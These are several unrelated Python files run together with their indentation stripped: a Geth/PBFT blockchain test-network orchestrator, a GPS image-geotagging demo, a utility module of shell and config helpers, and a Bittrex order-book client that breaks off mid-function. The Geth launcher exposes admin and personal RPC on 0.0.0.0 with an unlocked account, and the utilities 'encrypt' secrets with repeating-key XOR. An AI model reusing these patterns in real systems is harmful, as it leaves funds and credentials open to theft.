self.accounts.append(self.nodes[index].accounts[0])
# print(self.accounts)
def __str__(self) -> str:
return ', '.join([chain_node.__repr__() for chain_node in self.nodes])
def __repr__(self) -> str:
return self.chain_id if self.chain_id else 'root chain'
def config_genesis(self) -> None:
"""Copy genesis.json file into a container."""
threads = []
for server_ip in self.ips:
t = threading.Thread(target=server_ip.put_file, args=('../config/%s' % self.config_file, self.config_file))
t.start()
threads.append(t)
time.sleep(0.02)
time.sleep(self.node_count/25)
for t in threads:
t.join()
threads = []
for node in self.nodes:
command = 'docker cp %s %s:/root/%s' % (self.config_file, node.name, self.config_file)
t = threading.Thread(target=node.ip.exec_command, args=(command,))
t.start()
threads.append(t)
print('copying genesis file')
time.sleep(0.1)
time.sleep(1)
for t in threads:
t.join()
def config_consensus_chain(self) -> None:
"""Set genesis.json for a blockchain & init with genesis.json."""
if self.chain_id is "":
self.config_file = '0.json'
else:
self.config_file = '%s.json' % self.chain_id
generate_genesis(self.blockchain_id, self.accounts, self.config_file)
time.sleep(0.02)
self.config_genesis()
def config_leaf_chain(self, leaf_chains: ['SingleChain']) -> None:
"""Set genesis.json for leaf chains."""
if self.chain_id is "":
self.config_file = '0.json'
else:
self.config_file = '%s.json' % self.chain_id
generate_leaf_genesis(self.config_file, leaf_chains)
time.sleep(0.02)
self.config_genesis()
def config_terminal(self) -> None:
"""Set genesis.json for terminal equipments."""
if len(self.chain_id) == 2:
self.config_file = '0.json'
else:
self.config_file = '%s.json' % self.chain_id[:-2]
self.config_genesis()
def run_nodes(self) -> None:
"""Run nodes on a chain."""
self.init_geth()
self.run_geth_nodes()
time.sleep(1)
self.construct_chain()
def init_geth(self) -> None:
"""
run geth init command for nodes in a chain
"""
if self.config_file is None:
raise ValueError("initID is not set")
threads = []
for server_ip in self.ips:
for node in self.nodes:
if node.ip == server_ip:
init_geth_command = 'docker exec -t %s geth --datadir abc init %s' % (node.name, self.config_file)
t = threading.Thread(target=server_ip.exec_command, args=(init_geth_command,))
t.start()
threads.append(t)
time.sleep(0.3)
for t in threads:
t.join()
def run_geth_nodes(self):
threads = []
for node in self.nodes:
# Making the personal API available over RPC is not safe. Use IPC instead of RPC is safer.
start_geth_command = ('/usr/bin/geth --datadir abc --cache 1024 --port 30303 --rpcport 8545 --rpcapi '
'admin,eth,miner,web3,net,personal,txpool --rpc --rpcaddr 0.0.0.0 '
'--pbftid %d --nodeindex %d --blockchainid %d --unlock %s --password '
'passfile --maxpeers 1024 --maxpendpeers 1024 --txpool.globalslots 81920 '
'--txpool.globalqueue 81920 --syncmode full '
'--nodiscover >> %s.log 2>&1') % (node.pbft_id, node.node_index,
node.blockchain_id, node.accounts[0], node.name)
command = 'docker exec -td %s bash -c \"%s\" ' % (node.name, start_geth_command)
print(start_geth_command)
t = threading.Thread(target=node.ip.exec_command, args=(command,))
t.start()
threads.append(t)
time.sleep(0.8)
for t in threads:
t.join()
print('node starting')
# must wait here
for _ in range(4):
print('.', end='')
time.sleep(1)
print()
# set enode for every node
threads = []
for node in self.nodes:
t = threading.Thread(target=node.set_enode)
t.start()
threads.append(t)
time.sleep(0.05)
for t in threads:
t.join()
time.sleep(2)
# set enode map
for node in self.nodes:
enode_value = node.enode.split('@')[0][8:]
self.map[0].setdefault(enode_value, node)
def is_root_chain(self):
"""Check if chain is root chain."""
return self.chain_id == ""
def get_primer_node(self) -> GethNode:
"""Return the primer node of the set of Geth-pbft clients."""
return self.nodes[0]
def get_node_by_index(self, node_index: int = 1) -> GethNode:
"""Return the node of a given index."""
if node_index <= 0 or node_index > len(self.nodes):
raise ValueError("node index out of range")
return self.nodes[node_index-1]
def construct_chain(self) -> None:
"""Construct a single chain."""
if not self.is_terminal:
print("constructing single chain")
start_time = time.time()
threads = []
# connect nodes in a single chain with each other
for i in range(self.node_count):
for j in range(i+1, self.node_count):
# self.nodes[i].add_peer(self.nodes[j].enode, 0)
t = threading.Thread(target=self.nodes[i].ipc_add_peer, args=(self.nodes[j].enode, 0))
t.start()
threads.append(t)
time.sleep(0.1) # 0.2
break # in case of too many addPeer requests
for t in threads:
t.join()
# print('active threads:', threading.active_count())
# # use process pool
# with ThreadPoolExecutor(max_workers=5) as executor:
# for i in range(self.node_count):
# for j in range(i + 1, self.node_count):
# executor.submit(self.connect(self.nodes[i], self.nodes[j], 0))
print("-----------chain construction waiting--------------")
time.sleep(self.node_count / 4) #
# connect all nodes to each other
un_connected_nodes = set(self.nodes)
while True:
print('-------------------------')
print(un_connected_nodes)
connected_nodes = set()
threads = []
for node in un_connected_nodes:
if node.get_peer_count() != self.node_count - 1:
print('not enough peers', node.node_index)
node_peers_info = node.get_peers()
peers = {peer['id'] for peer in node_peers_info}
peers.add(node.enode.split('@')[0][8:])
un_connected_peers = set(self.map[0].keys()).difference(peers)
# print('~~~~~~~~~~~~~~')
# print('unconnected peers: %d' % len(un_connected_peers))
# print('------------------')
# print(node.node_index, un_connected_peers)
# print('------------------')
for enode_value in un_connected_peers:
t = threading.Thread(target=node.ipc_add_peer, args=(self.map[0][enode_value].enode, 0))
t.start()
threads.append(t)
time.sleep(0.1) # 0.2
print('waiting for peers')
else:
connected_nodes.add(node)
for t in threads:
t.join()
un_connected_nodes = un_connected_nodes.difference(connected_nodes)
if not un_connected_nodes:
break
else:
time.sleep(len(un_connected_nodes) / 4)
end_time = time.time()
print('construction complete: %.3fs' % (end_time - start_time))
def connect_lower_chain(self, other_chain: 'SingleChain') -> None:
"""Connect to a lower level single chain."""
print('level:', self.level)
threads = []
for node in self.nodes:
for other in other_chain.nodes:
t = threading.Thread(target=other.ipc_add_peer, args=(node.enode, 2)) # param 2 means upper peer
t.start()
time.sleep(0.1) # if fail. increase this value.
threads.append(t)
# t1 = threading.Thread(target=node.ipc_add_peer, args=(other.enode, 1)) # param 1 means lower peer
# t1.start()
# time.sleep(0.1)
# threads.append(t1)
# time.sleep(0.3)
# break
for t in threads:
t.join()
time.sleep(self.node_count//5+1)
self.map[1].update(other_chain.map[0])
other_chain.map[2].update(self.map[0])
upper_chain_un_connected_nodes = set(self.nodes)
lower_chain_un_connected_nodes = set(other_chain.nodes)
while True:
print('--------------------')
connected_upper = set()
connected_lower = set()
threads = []
for node in upper_chain_un_connected_nodes:
upper_node_all_peers_info = node.get_peers() # all peers connected to upper chain node
# current lower chain nodes connected to upper chain node
upper_chain_current_peers = {peer['id'] for peer in upper_node_all_peers_info
if peer['flag'] == 'Low Level Peer, child'}
un_connected_peers = set(other_chain.map[0].keys()).difference(upper_chain_current_peers)
if not un_connected_peers:
connected_upper.add(node)
for enode_value in un_connected_peers:
print("enode is", enode_value)
t = threading.Thread(target=node.ipc_add_peer, args=(self.map[1][enode_value].enode, 1))
t.start()
print('connecting to lower node again')
threads.append(t)
time.sleep(0.1) #
for node in lower_chain_un_connected_nodes:
lower_node_all_peers_info = node.get_peers() # all peers connected to lower chain node
# current upper chain nodes connected to lower chain node
lower_chain_current_peers = {peer['id'] for peer in lower_node_all_peers_info
if peer['flag'] == 'Upper Level Peer, parent'}
un_connected_peers = set(self.map[0].keys()).difference(lower_chain_current_peers)
if not un_connected_peers:
connected_lower.add(node)
for enode_value in un_connected_peers:
print("enode is", enode_value)
t = threading.Thread(target=node.ipc_add_peer, args=(other_chain.map[2][enode_value].enode, 2))
t.start()
print('connecting to upper node again')
threads.append(t)
time.sleep(0.1) #
upper_chain_un_connected_nodes = upper_chain_un_connected_nodes.difference(connected_upper)
lower_chain_un_connected_nodes = lower_chain_un_connected_nodes.difference(connected_lower)
if upper_chain_un_connected_nodes or lower_chain_un_connected_nodes:
time.sleep((len(upper_chain_un_connected_nodes)+len(lower_chain_un_connected_nodes)) / 3)
else:
break
time.sleep(1)
def connect_upper_chain(self, other_chain: 'SingleChain') -> None:
"""Connect to an upper level single chain."""
pass
time.sleep(0.01)
threads = []
for node in self.nodes:
for other in other_chain.nodes:
ep = other.enode
t = threading.Thread(target=node.add_peer, args=(ep, 2)) # param 2 means upper peer
t.start()
threads.append(t)
time.sleep(0.05)
for t in threads:
t.join()
time.sleep(self.node_count//5+1)
# def static_construct_chain(self) -> None:
# """Use static-nodes.json to construct single chain."""
# if not self.is_terminal:
# print('constructing single chain...')
# enodes = []
# for node in self.nodes:
# enodes.append(node.enode)
# pass
def get_parent_chain_id(self) -> str:
"""Return chain ID of parent chain."""
if self.chain_id == '':
print("Root chain has no parent chain.")
return ''
else:
return self.chain_id[:-2]
def destruct_chain(self) -> None:
"""Stop containers to destruct the chain."""
threads = []
for node in self.nodes:
t = threading.Thread(target=node.stop)
t.start()
threads.append(t)
for t in threads:
t.join()
def get_node_count(self) -> int:
"""Return the number of nodes of the blockchain."""
return len(self.nodes)
def set_number(self) -> None:
"""Set (number, threshold) value for the nodes of the blockchain."""
if not self.if_set_number:
p = self.get_primer_node()
p.set_number(self.node_count, self.threshold)
self.if_set_number = True
else:
raise RuntimeError("number of chain %s already set" % self.chain_id)
time.sleep(0.5*(len(self.nodes)//10+1))
def set_level(self, max_level: int) -> None:
"""Set level info for each node."""
threads = []
if not self.if_set_level:
for node in self.nodes:
t = threading.Thread(target=node.set_level, args=(self.level, max_level))
t.start()
threads.append(t)
time.sleep(0.02)
for t in threads:
t.join()
self.if_set_level = True
time.sleep(0.05)
else:
raise RuntimeError("level of chain %s already set" % self.chain_id)
def set_id(self) -> None:
"""Set ID for a blockchain."""
if not self.if_set_number and self.if_set_level:
raise RuntimeError("number and level info should be set previously")
if len(self.chain_id) // 2 != self.level:
raise ValueError("length of id should match level number")
if not self.if_set_id:
if self.level == 0:
p = self.get_primer_node()
p.set_id("")
else:
threads = []
for node in self.nodes:
t = threading.Thread(target=node.set_id, args=(self.chain_id,))
t.start()
threads.append(t)
time.sleep(0.02) ###
for t in threads:
t.join()
time.sleep(0.5)
self.if_set_id = True
else:
raise RuntimeError("ID of chain %s already set" % self.chain_id)
def start_miner(self) -> None:
"""Start miners of all nodes on the chain."""
if not self.is_terminal:
threads = []
for node in self.nodes:
t = threading.Thread(target=node.start_miner)
t.start()
threads.append(t)
time.sleep(0.02)
for t in threads:
t.join()
def stop_miner(self) -> None:
"""Stop miners of all nodes on the chain."""
if not self.is_terminal:
threads = []
for node in self.nodes:
t = threading.Thread(target=node.stop_miner)
t.start()
threads.append(t)
time.sleep(0.02)
for t in threads:
t.join()
def get_log(self, node_index: int) -> None:
# time.sleep(2) #
node = self.get_node_by_index(node_index)
filename = 'chain%s_node%d.txt' % (self.chain_id, node_index)
# check if the log file exists, if True, do nothing
if os.path.exists('../data/%s' % filename):
print('log exists')
else:
node.ip.exec_command('docker cp %s:/root/result%d ./%s' % (node.name, node_index, filename))
time.sleep(0.2)
node.ip.get_file(filename, '../data/'+filename)
def search_log(self, node_index: int, block_index: int, if_get_block_tx_count: bool = True) -> None:
node = self.get_node_by_index(node_index)
filename = '../data/chain%s_node%d.txt' % (self.chain_id, node_index)
# map of (block index, {block prepare time: t1, block consensus confirm time: t2, block written time: t3})
block_time = defaultdict(dict)
with open(filename, 'r') as log:
for line in log.readlines():
line = line.strip()
arr = line.split()
if arr[0].startswith('block'):
if int(arr[1]) > node_index + 10: # in case of too many blocks
break
tmp = arr[-4].split('.')
tmp[1] = tmp[1][:6]
arr[-4] = '.'.join(tmp)
arr[-5] = arr[-5][1:]
arr[-5] += '-' + arr[-4]
block_time[arr[1]][arr[2]] = arr[-5]
# print(block_time)
if if_get_block_tx_count:
for index_str in block_time.keys():
index = int(index_str)
if index > block_index + 10: # in case of too many blocks
break
tx_count = node.get_block_transaction_count(index)
block_time[index_str]['tx_count'] = tx_count
json_name = '../data/chain%s_node%d.json' % (self.chain_id, node_index)
json_str = json.dumps(block_time, indent=2)
with open(json_name, 'w') as f:
print(json_str, file=f)
# try:
# written_time_str = block_time[str(block_index)]['written']
# written_time = datetime.strptime(written_time_str, '%Y-%m-%d-%H:%M:%S.%f') # type: datetime
# tx_count = block_time[str(block_index)]['tx_count']
# with open('../data/elapsed_time.txt', 'a') as log:
# log.write('%s block index: %d, time: %s TX count:%d\n' % (filename, block_index, written_time, tx_count))
# except KeyError as e:
# print(e)
# @staticmethod
# def connect(node1: 'GethNode', node2: 'GethNode', tag: int):
# node1.ipc_add_peer(node2.enode, tag)
# time.sleep(0.2)
if __name__ == "__main__":
ip_list = IPList(ip_file=IP_CONFIG)
ip_list.stop_all_containers()
node_count = 4
c = SingleChain(name='01', level=0, node_count=node_count, threshold=node_count*2//3+1,
blockchain_id=121, ip_list=ip_list)
c.singlechain_start()
c.config_consensus_chain()
c.run_nodes()
fail_count = 0
for i in range(1, node_count + 1):
node = c.get_node_by_index(i)
count = node.get_peer_count()
print(count)
if count != node_count - 1:
fail_count += 1
print("fail count:", fail_count)
# c.destruct_chain()
|
monodemo.py
|
# coding: utf-8
"""Monolithic demo program
Demonstration of the workflow and commands PiG uses to geotag an image.
"""
from collections import deque
from threading import Thread
from gi.repository import GExiv2
from gps import gps, isotime, WATCH_ENABLE
from subprocess32 import Popen, PIPE, check_output
last_fix = deque([], 1)
running = True
geothread = None
def read_gps():
global last_fix
session = gps(mode=WATCH_ENABLE)
while running:
fix = session.next()
if fix['class'] == 'TPV':
fix = [fix.lon, fix.lat, fix.alt, isotime(fix.time)]
last_fix.append(fix)
def init():
global geothread
geothread = Thread(target=read_gps)
geothread.start()
def capture():
p = Popen(['gphoto2', '--wait-event-and-download'], stdout=PIPE)
while True:
line = p.stdout.readline()
fix = last_fix[0]
if not line.startswith('Saving'):
continue
image = line.rsplit(' ', 1)[-1].strip()
geotag(image, fix)
def geotag(image, fix):
fix = [float(item) for item in fix[:3]]
print image, '←', fix
exif = GExiv2.Metadata(image)
exif.set_gps_info(*fix)
exif.save_file()
def main():
global running
init()
try:
capture()
except KeyboardInterrupt:
pass
running = False
geothread.join()
|
safutils.py
|
# ATTENTION! File managed by Puppet. Changes will be overwritten.
from __future__ import print_function
import ConfigParser
import StringIO
import inspect
import itertools
import os
import re
import shlex
import shutil
import subprocess
import threading
import urllib
import saf
from saf.exceptions import *
from saf.packages import em
from saf.packages import requests
import logging
logger = logging.getLogger(__name__)
def method_trace(fn):
from functools import wraps
@wraps(fn)
def wrapper(*my_args, **my_kwargs):
logger.debug(
'>>> %s(%s ; %s ; %s)' % (fn.__name__, inspect.getargspec(fn), my_args, my_kwargs))
out = fn(*my_args, **my_kwargs)
logger.debug('<<< %s' % fn.__name__)
return out
return wrapper
@method_trace
def command_rc(cmd, cwd=None, assert_rc=True, silent=True):
"""
Execute shell command and (optionally, depending on silent flag) print stdout. Return rc
:param cmd: String containing the command (e.g. "git pull")
:param cwd: The directory which will be cwd for the command
:param assert_rc: If True then raise exception if command rc!=0
:param silent: If True then just log.debug(stdout). If False then log.info(stdout)
:raises SafConfigException If rc!=0 (and assert_rc=True)
:return: True if rc=0, False otherwise
"""
# TODO: Cleverly combine this method with command_stdout()
proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE,
cwd=cwd)
out, err = [x.decode("utf-8") for x in proc.communicate()]
logger.debug('returned from command with proc.returncode=%s' % proc.returncode)
# remove trailing linefeeds
out = out.rstrip()
err = err.rstrip()
if silent:
logger.debug('stdout:%s' % out)
else:
logger.info('%s' % out)
logger.debug('stderr:%s' % err)
if assert_rc and proc.returncode != 0:
raise SafExecutionException(
"Error (rc:%s) when running %s: %s" % (proc.returncode, cmd, err))
return not proc.returncode
@method_trace
def command_stdout(cmd, cwd=None, assert_rc=True):
"""
Execute shell command. Return stdout
:param cmd: String containing the command (e.g. "git pull")
:param cwd: The directory which will be cwd for the command
:param assert_rc: If True then raise exception if command rc!=0
:raises SafConfigException If rc!=0 (and assert_rc=True)
:return: stdout of process call
"""
proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE,
cwd=cwd)
out, err = [x.decode("utf-8") for x in proc.communicate()]
# remove trailing linefeeds
out = out.rstrip()
err = err.rstrip()
logger.debug('returned from command with proc.returncode=%s' % proc.returncode)
logger.debug('stdout:%s' % out)
logger.debug('stderr:%s' % err)
if assert_rc and proc.returncode != 0:
raise SafExecutionException(
"Error (rc:%s) when running %s: %s" % (proc.returncode, cmd, err))
return out
@method_trace
def run_process(cmd, cwd=None, log_output=True):
"""
Run process. Tail output forever. This method is used exclusively for that purpose.
It should be possible to not have a separate function for this purpose but I was unable to
figure that out. It's rather tricky. If you want to try make sure to test all possible cases
:param cmd: The command string (e.g. "git pull")
:param cwd: The directory which will be cwd for the command
:param log_output: Whether to additionally capture the output in the logfile or just print it
:raises SafExecutionException
:return: True if shell command $?=0, False otherwise
"""
if type(cmd) is not str:
raise SafExecutionException('run_process requires a string arg')
cmd = shlex.split(cmd)
if cwd:
logger.debug('running "%s" in directory %s' % (cmd, cwd))
else:
logger.debug('running "%s"' % cmd)
process = None
try:
if log_output:
out_func = logger.info
else:
out_func = print
# http://stackoverflow.com/questions/375427/non-blocking-read-on-a-subprocess-pipe-in-python/437888#437888
# http://stackoverflow.com/questions/12057794/python-using-popen-poll-on-background-process#12058609
# Also tried several approaches based on
# http://stackoverflow.com/questions/12523044/how-can-i-tail-a-log-file-in-python#12523371
# but was not able to solve the "tail -f problem" (aka continuous stdout processing)
# Also failed with p.communicate()
def process_stream(myprocess, stream): # output-consuming thread
# stream is either stdout or stderr pipe of the process
next_line = None
buf = ''
while True:
out = stream.read(1)
if out == '' and myprocess.poll() is not None:
break
if out != '':
if out == '\n':
next_line = buf
buf = ''
else:
buf += out
if not next_line:
continue
line = next_line
next_line = None
out_func(line)
stream.close()
process = subprocess.Popen(cmd, cwd=cwd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout_poller = threading.Thread(target=process_stream, args=(process, process.stdout,))
stdout_poller.daemon = True
stdout_poller.start()
stderr_poller = threading.Thread(target=process_stream, args=(process, process.stderr,))
stderr_poller.daemon = True
stderr_poller.start()
# while process.poll() is None:
# logger.debug('running')
# time.sleep(1)
process.wait()
logger.debug('returned from wait() with process.returncode=%s' % process.returncode)
if stdout_poller and stdout_poller.is_alive():
logger.debug('joining stdout_poller')
stdout_poller.join()
logger.debug('joined stdout_poller')
if stderr_poller and stderr_poller.is_alive():
logger.debug('joining stderr_poller')
stderr_poller.join()
logger.debug('joined stderr_poller')
except OSError as e:
logger.error("Error in call: %s" % e)
raise SafExecutionException(e)
except KeyboardInterrupt:
logger.debug('KeyboardInterrupt')
finally:
rc = 255
termination = 'irregular'
if process and process.returncode is not None:
rc = process.returncode
termination = 'regular'
logger.debug('%s exit, rc: %s' % (termination, rc))
# negated shell returncode equals python boolean
# i.e. $?=0 returns True, $?!=0 returns False
return not rc
@method_trace
def _get_secret():
"""
Retrieve contents of SAF secret file (/app/saf/conf/secret)
:raises SafConfigException if secret not present
:return: string representing the SAF secret
"""
secret_file_name = os.path.join(saf.base_path, 'conf', 'secret')
secret = None
try:
with open(secret_file_name, 'r') as secret_file:
for line in secret_file:
if line.startswith('#'):
continue
else:
secret = line
break
if secret is None:
raise SafConfigException('Missing secret')
return secret
except IOError as e:
raise SafConfigException(e)
@method_trace
def parse_kv_file(file_name):
"""
Retrieve contents of plain key=value file
:param file_name: The name of the file
:raises SafConfigException if the file could not be parsed
:return: dict containing all key/value pairs
"""
try:
parser = ConfigParser.ConfigParser()
# http://stackoverflow.com/questions/19359556/configparser-reads-capital-keys-and-make-them-lower-case#19359720
parser.optionxform = str
with open(file_name) as stream:
# http://stackoverflow.com/questions/2885190/using-pythons-configparser-to-read-a-file-without-section-name
fakefile = StringIO.StringIO("[top]\n" + stream.read())
parser.readfp(fakefile)
result = dict(parser.items('top'))
logger.debug('result:%s' % result)
return result
except IOError as e:
raise SafConfigException('Could not parse file: %s' % e)
@method_trace
def encrypt(literal):
literal = ' '.join(literal)
inf_key = itertools.chain.from_iterable(itertools.repeat(_get_secret()))
result = ''.join(chr(ord(a) ^ ord(b)) for a, b in zip(literal, inf_key)).encode(
'base64').strip()
return '{ENC}%s' % result
@method_trace
def decrypt(literal):
if literal.startswith('{ENC}'):
inf_key = itertools.chain.from_iterable(itertools.repeat(_get_secret()))
result = ''.join(
chr(ord(a) ^ ord(b)) for a, b in zip(literal[5:].decode('base64'), inf_key))
return result
else:
raise SafExecutionException("Decrypted values must start with {ENC}")
@method_trace
def wipe_dir(dir_name):
"""
delete contents of dir_name but leave dir_name in place
:param dir_name: The name of the directory to wipe contents from
:raises SafExecutionException if IOError occurs
"""
# http://stackoverflow.com/questions/185936/delete-folder-contents-in-python#185941
for the_file in os.listdir(dir_name):
file_path = os.path.join(dir_name, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except IOError as e:
raise SafExecutionException(e)
@method_trace
def render_template(file_name, overlay_dict):
"""
Render mixin template to resolved file using empy interpreter
:param file_name: The name of the file
:param overlay_dict: Dictionary containing key=value pairs to replace
:raises SafConfigException if the file could not be rendered
:return: dict containing all key/value pairs
"""
if is_binary(file_name):
logger.debug('is_binary:%s' % file_name)
return
with open(file_name) as f:
data = f.read()
f.close()
# overlay_dict must not be modified because of is_confidential check
temp_dict = dict(overlay_dict)
is_confidential = False
for key in temp_dict.keys():
if temp_dict[key].startswith('{ENC}'):
temp_dict[key] = decrypt(temp_dict[key])
if re.search("@\(?%s\)?" % key, data) is not None:
is_confidential = True
logger.debug('is_confidential:%s' % is_confidential)
interpreter = em.Interpreter()
try:
out = interpreter.expand(data, temp_dict)
except Exception as e:
raise SafExecutionException("Problems rendering %s: %s" % (file_name, str(e)))
with open(file_name, 'w') as f:
if is_confidential:
os.chmod(f.name, 0o600)
f.write(out)
f.close()
# http://stackoverflow.com/questions/3685195/line-up-columns-of-numbers-print-output-in-table-format#3685943
@method_trace
def align_columns(lines, is_left_align=True):
cols = map(lambda *row: [str(field) or '' for field in row], *lines)
widths = [max(len(field) for field in col) for col in cols]
format = ['%%%s%ds' % ('-' if is_left_align else '', width) for width in widths]
return [' '.join(format[:len(row)]) % tuple(row) for row in lines]
# http://stackoverflow.com/questions/898669/how-can-i-detect-if-a-file-is-binary-non-text-in-python
@method_trace
def is_binary(file_name):
text_chars = bytearray([7, 8, 9, 10, 12, 13, 27]) + bytearray(range(0x20, 0x7f)) + bytearray(
range(0x80, 0x100))
f = open(file_name, 'rb')
data = f.read(1024)
return bool(data.translate(None, text_chars))
# http://stackoverflow.com/questions/3229419/pretty-printing-nested-dictionaries-in-python
@method_trace
def prettyprint_dict(d, indent=4):
for key, value in sorted(d.iteritems()):
line = ' ' * indent + str(key)
if isinstance(value, dict):
logger.info(line + ':')
prettyprint_dict(value, indent * 2)
else:
logger.info(line + ' : ' + str(value))
# http://stackoverflow.com/questions/1392413/calculating-a-directory-size-using-python
@method_trace
def directory_size(path):
total_size = 0
seen = set()
for dirpath, dirnames, filenames in os.walk(path):
for f in filenames:
fp = os.path.join(dirpath, f)
try:
stat = os.stat(fp)
except OSError:
continue
if stat.st_ino in seen:
continue
seen.add(stat.st_ino)
total_size += stat.st_size
return total_size # size in bytes
# http://stackoverflow.com/questions/10123929/python-requests-fetch-a-file-from-a-local-url
class LocalFileAdapter(requests.adapters.BaseAdapter):
"""Protocol Adapter to allow Requests to GET file:// URLs
TODO: Properly handle non-empty hostname portions.
"""
@staticmethod
@method_trace
def _chkpath(method, path):
"""Return an HTTP status for the given filesystem path."""
if method.lower() in ('put', 'delete'):
return 501, "Not Implemented" # TODO
elif method.lower() not in ('get', 'head'):
return 405, "Method Not Allowed"
elif os.path.isdir(path):
return 400, "Path '%s' is not a file" % path
elif not os.path.isfile(path):
return 404, "File '%s' not found" % path
elif not os.access(path, os.R_OK):
return 403, "Access to '%s' denied" % path
else:
return 200, "OK"
@method_trace
def send(self, req, **kwargs):
"""Return the file specified by the given request
@type req: C{PreparedRequest}
@todo: Should I bother filling `response.headers` and processing
If-Modified-Since and friends using `os.stat`?
"""
path = os.path.normcase(os.path.normpath(urllib.url2pathname(req.path_url)))
logger.debug('path:%s' % path)
response = requests.Response()
response.status_code, response.reason = self._chkpath(req.method, path)
if response.status_code == 200 and req.method.lower() != 'head':
try:
response.raw = open(path, 'rb')
except (OSError, IOError) as err:
response.status_code = 500
response.reason = str(err)
if isinstance(req.url, bytes):
response.url = req.url.decode('utf-8')
else:
response.url = req.url
response.request = req
response.connection = self
return response
@method_trace
def close(self):
pass
@method_trace
def assert_knowhow(knowhow_object, knowhow_key, auto_acknowledge):
""" Ensure that non-standard, project-specific SAF operating instructions are known
to the operator """
action = knowhow_key.split('.')[-1]
if knowhow_key in knowhow_object.knowhow().keys():
if auto_acknowledge:
logger.info(
"This app requires special %s handling described in %s. You acknowledged that you are familiar with these instructions." %
(action, knowhow_object.knowhow()[knowhow_key]))
else:
logger.info(
"This app requires special %s handling described in %s. Please make sure to familiarize yourself with these instructions before proceeding." %
(action, knowhow_object.knowhow()[knowhow_key]))
answer = raw_input("Ready to proceed (Y/n)? ")
if answer not in ['y', 'Y', '']:
raise SafExecutionException('Please read the instructions before proceeding')
else:
logger.debug("Nothing to know")
class IKnowhow(object):
""" Derived classes must implement a knowhow() method which has to return
a dict object containing knowhow asserts taken from app.conf """
from abc import ABCMeta, abstractmethod
__metaclass__ = ABCMeta
@abstractmethod
def knowhow(self):
""" Return a dict containing knowhow_key / -_value pairs. The
dict should be readonly """
raise NotImplementedError
class ImmutableDict(dict):
""" Use ImmutableDict for handling dicts which are meant to be readonly.
An attempt to modify the dict leads to AttributeError. This hack is not
tamper proof! It's just used to remind the coder that he is not meant to
change the dict """
def __setitem__(self, key, val):
raise AttributeError("Dict is immutable")
|
order_book.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# bittrex_websocket/order_book.py
# Stanislav Lazarov
try:
import queue as queue
except ImportError:
import Queue as queue
from copy import deepcopy
from threading import Thread
from time import sleep, time
from requests import get
from bittrex_websocket.websocket_client import BittrexSocket
class OrderBook(BittrexSocket):
def __init__(self, tickers=None, book_depth=10, conn_type='normal'):
"""
:param tickers: a list of tickers, single tickers should also be supplied as a list
:type tickers: []
:param book_depth: The depth of the order book
:type book_depth: int
:param conn_type: 'normal' direct connection or 'cloudflare' workaround
:type conn_type: str
"""
if tickers is None:
self.tickers = ['BTC-ETH']
else:
self.tickers = tickers
super(OrderBook, self).__init__(tickers=self.tickers, conn_type=conn_type)
self.book_depth = book_depth
self.tick_queue = queue.Queue()
self.snapshot_ls = deepcopy(self.tickers)
self.orderbook_events = queue.Queue()
self.api_order_books = {}
self.socket_order_books = {}
def _go(self):
# Create socket connections
self._start()
# Get static snapshopts
self.api_order_books = self._get_static_snapshots()
# Match and confirm order books
self._confirm_orderbook()
# Start syncing with updates queue
self._sync()
def on_open(self):
self.client_callbacks = ['updateExchangeState']
self.server_callbacks = ['SubscribeToExchangeDeltas', 'queryExchangeState']
def _get_static_snapshots(self):
order_queue = queue.Queue()
num_threads = min(len(self.tickers), 10)
order_books = {}
for ticker in self.tickers:
# Load the queue with api_tickers
order_queue.put(ticker)
# Pre-order order books
order_books[ticker] = \
{
'buy': None,
'sell': None,
'MarketName': ticker
}
def _retrieve(q, result):
while not q.empty():
work = q.get(False)
try:
api_url = 'https://bittrex.com/api/v1.1/public/getorderbook'
payload = {'market': work, 'type': 'both'}
data = get(api_url, payload).json()['result']
result[work] = \
{
'buy': data['buy'],
'sell': data['sell'],
'MarketName': work,
}
except Exception as e:
print(e)
break
q.task_done()
print('Retrieving order book snapshot...')
for j in list(range(num_threads)):
worker = Thread(target=_retrieve, args=(order_queue, order_books))
worker.setDaemon(True)
worker.start()
order_queue.join()
print('Order book snapshot retrieved.')
return order_books
def _confirm_orderbook(self):
def _get_queue(queue_object1):
try:
event = queue_object1.get(False)
except queue.Empty:
sleep(0.5)
else:
if event is not None and _confirm(event):
queue_object1.task_done()
def _confirm(event):
# Currently confirms only the BUY side.
side_matched = False
j = 0
ticker_del = -1
for order in event['Buys']:
if side_matched is False:
order_matched = False
for ticker in self.api_order_books:
if order_matched is False:
for k, order2 in enumerate(self.api_order_books[ticker]['buy']):
if order == order2:
j += 1
order_matched = True
if j == 5:
j = 0
side_matched = True
ticker_del = ticker
del self.api_order_books[ticker]['buy'][k]
break
else:
break
else:
del self.api_order_books[ticker_del]
event['MarketName'] = ticker_del
del event['Fills']
event['Buys'] = event['Buys'][0:self.book_depth]
event['Sells'] = event['Sells'][0:self.book_depth]
self.socket_order_books[ticker_del] = event
return True
# Wait until all the snapshot requests are received from the websocket
while self.orderbook_events.unfinished_tasks < len(self.tickers):
sleep(0.5)
else:
print('Order books\' name confirmation in progress...')
# Wait until the order book snapshots are identified and confirmed
while len(self.socket_order_books) < len(self.tickers):
_get_queue(self.orderbook_events)
else:
print('Order books\' name confirmed. Start syncing...')
def _sync(self):
while True:
# Wait for the order books to be confirmed.
if self.socket_order_books != {}:
while True:
try:
event = self.tick_queue.get()
except queue.Empty:
pass
else:
if event is not None:
self._sync_order_book(event)
self.tick_queue.task_done()
def _sync_order_book(self, order_data):
# Syncs the order book for the pair, given the most recent data from the socket
pair_name = order_data['MarketName']
nounce_diff = order_data['Nounce'] - self.socket_order_books[pair_name]['Nounce']
if nounce_diff == 1:
self.socket_order_books[pair_name]['Nounce'] = order_data['Nounce']
# Start syncing
for side in [['Buys', True], ['Sells', False]]:
made_change = False
for order in order_data[side[0]]:
# TYPE 0: New order entries at matching price
# -> ADD to order book
if order['Type'] == 0:
self.socket_order_books[pair_name][side[0]].append(
{
'Quantity': order['Quantity'],
'Rate': order['Rate']
})
made_change = True
# TYPE 1: Cancelled / filled order entries at matching price
# -> DELETE from the order book
elif order['Type'] == 1:
for i, existing_order in enumerate(
self.socket_order_books[pair_name][side[0]]):
